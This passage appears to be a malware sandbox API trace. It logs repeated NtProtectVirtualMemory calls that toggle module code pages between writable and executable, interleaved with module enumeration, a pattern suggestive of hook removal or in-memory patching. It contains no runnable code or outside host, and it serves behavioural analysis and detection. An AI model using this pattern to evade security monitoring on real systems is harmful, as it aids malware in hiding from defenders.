NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.693] GetCurrentProcess () returned 0xffffffff [0068.693] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621010, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.693] GetCurrentProcess () returned 0xffffffff [0068.693] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621018, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.693] GetCurrentProcess () returned 0xffffffff [0068.693] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621018, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.693] GetCurrentProcess () returned 0xffffffff [0068.693] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621034, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.693] GetCurrentProcess () returned 0xffffffff [0068.693] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621034, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.693] GetCurrentProcess () returned 0xffffffff [0068.694] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621038, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.694] GetCurrentProcess () returned 0xffffffff [0068.694] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621038, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.694] GetCurrentProcess () returned 0xffffffff [0068.694] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621048, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.694] GetCurrentProcess () returned 0xffffffff [0068.694] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621048, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.694] GetCurrentProcess () returned 0xffffffff [0068.694] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621054, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.694] GetCurrentProcess () returned 0xffffffff [0068.695] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621054, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.695] GetCurrentProcess () returned 0xffffffff [0068.695] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621060, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.695] GetCurrentProcess () returned 0xffffffff [0068.695] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621060, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.695] GetCurrentProcess () returned 0xffffffff [0068.695] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7562107c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.695] GetCurrentProcess () returned 0xffffffff [0068.695] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7562107c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.695] GetCurrentProcess () returned 0xffffffff [0068.695] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621080, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.696] GetCurrentProcess () returned 0xffffffff [0068.696] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621080, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.696] GetCurrentProcess () returned 0xffffffff [0068.696] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621084, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.696] GetCurrentProcess () returned 0xffffffff [0068.696] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621084, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.696] GetCurrentProcess () returned 0xffffffff [0068.696] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621088, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.696] GetCurrentProcess () returned 0xffffffff [0068.696] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621088, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.697] GetCurrentProcess () returned 0xffffffff [0068.697] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756210a8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.697] GetCurrentProcess () returned 0xffffffff [0068.697] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756210a8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.697] GetCurrentProcess () returned 0xffffffff [0068.697] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756210ac, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.697] GetCurrentProcess () returned 0xffffffff [0068.697] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756210ac, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.697] GetCurrentProcess () returned 0xffffffff [0068.697] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7562110c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.698] GetCurrentProcess () returned 0xffffffff [0068.698] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7562110c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.698] GetCurrentProcess () returned 0xffffffff [0068.698] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7562114c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.698] GetCurrentProcess () returned 0xffffffff [0068.698] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7562114c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.698] GetCurrentProcess () returned 0xffffffff [0068.698] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621154, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.698] GetCurrentProcess () returned 0xffffffff [0068.698] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75621154, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.699] GetCurrentProcess () returned 0xffffffff [0068.699] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756211b0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.699] GetCurrentProcess () returned 0xffffffff [0068.699] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756211b0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.699] GetCurrentProcess () returned 0xffffffff [0068.699] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756211c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.699] GetCurrentProcess () returned 0xffffffff [0068.699] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756211c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.699] GetCurrentProcess () returned 0xffffffff [0068.699] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756211e0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.700] GetCurrentProcess () returned 0xffffffff [0068.700] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x756211e0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75621000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.700] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.701] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c0154, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.701] GetCurrentProcess () returned 0xffffffff [0068.701] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c0154, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.701] GetCurrentProcess () returned 0xffffffff [0068.701] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c015c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.701] GetCurrentProcess () returned 0xffffffff [0068.701] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c015c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.701] GetCurrentProcess () returned 0xffffffff [0068.701] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c0160, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.702] GetCurrentProcess () returned 0xffffffff [0068.702] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c0160, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.702] GetCurrentProcess () returned 0xffffffff [0068.702] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c0164, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.702] GetCurrentProcess () returned 0xffffffff [0068.702] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c0164, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.702] GetCurrentProcess () returned 0xffffffff [0068.702] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c01c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.702] GetCurrentProcess () returned 0xffffffff [0068.702] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c01c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.703] GetCurrentProcess () returned 0xffffffff [0068.703] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c01d4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.703] GetCurrentProcess () returned 0xffffffff [0068.703] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c01d4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.703] GetCurrentProcess () returned 0xffffffff [0068.703] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c01e4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.703] GetCurrentProcess () returned 0xffffffff [0068.703] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c01e4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.703] GetCurrentProcess () returned 0xffffffff [0068.703] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c01f0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.703] GetCurrentProcess () returned 0xffffffff [0068.704] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c01f0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.704] GetCurrentProcess () returned 0xffffffff [0068.704] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c01f4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.704] GetCurrentProcess () returned 0xffffffff [0068.704] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c01f4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.704] GetCurrentProcess () returned 0xffffffff [0068.704] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c0220, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.704] GetCurrentProcess () returned 0xffffffff [0068.704] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x767c0220, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x767c0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.705] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.705] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75801080, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.705] GetCurrentProcess () returned 0xffffffff [0068.705] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75801080, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.706] GetCurrentProcess () returned 0xffffffff [0068.706] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7580108c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.706] GetCurrentProcess () returned 0xffffffff [0068.706] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7580108c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.706] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758010ec, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.706] GetCurrentProcess () returned 0xffffffff [0068.706] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758010ec, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.706] GetCurrentProcess () returned 0xffffffff [0068.706] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758010f8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.707] GetCurrentProcess () returned 0xffffffff [0068.707] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758010f8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.707] GetCurrentProcess () returned 0xffffffff [0068.707] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758010fc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.707] GetCurrentProcess () returned 0xffffffff [0068.707] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758010fc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.707] GetCurrentProcess () returned 0xffffffff [0068.707] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75801100, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.707] GetCurrentProcess () returned 0xffffffff [0068.707] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75801100, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, 